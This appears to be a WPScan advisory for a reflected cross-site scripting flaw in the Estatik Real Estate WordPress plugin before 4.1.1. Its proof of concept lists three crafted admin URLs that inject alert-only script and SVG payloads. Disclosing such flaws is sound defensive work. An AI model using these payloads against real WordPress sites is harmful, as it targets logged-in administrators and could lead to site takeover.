WordPress Plugin Vulnerabilities
Estatik Real Estate Plugin < 4.1.1 - Reflected XSS
Description
The plugin does not sanitise and escape various parameters and generated URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin
Proof of Concept
Make a logged in admin open one of the URLs below (some require that at least one property exist in the plugin): https://example.com/wp-admin/edit.php?post_type=properties&"><script>alert`XSS`</script> https://example.com/wp-admin/edit.php?post_type=properties&order="><svg/onload=alert(/XSS/)> (other affected parameter: orderby) https://example.com/wp-admin/admin.php?page=es_demo&"><script>alert`XSS`</script>
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
Miscellaneous
Original Researcher
Erwan LR (WPScan)
Submitter
Erwan LR (WPScan)
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-12-25 (about 4 months ago)
Added
2023-12-25 (about 4 months ago)
Last Updated
2023-12-25 (about 4 months ago)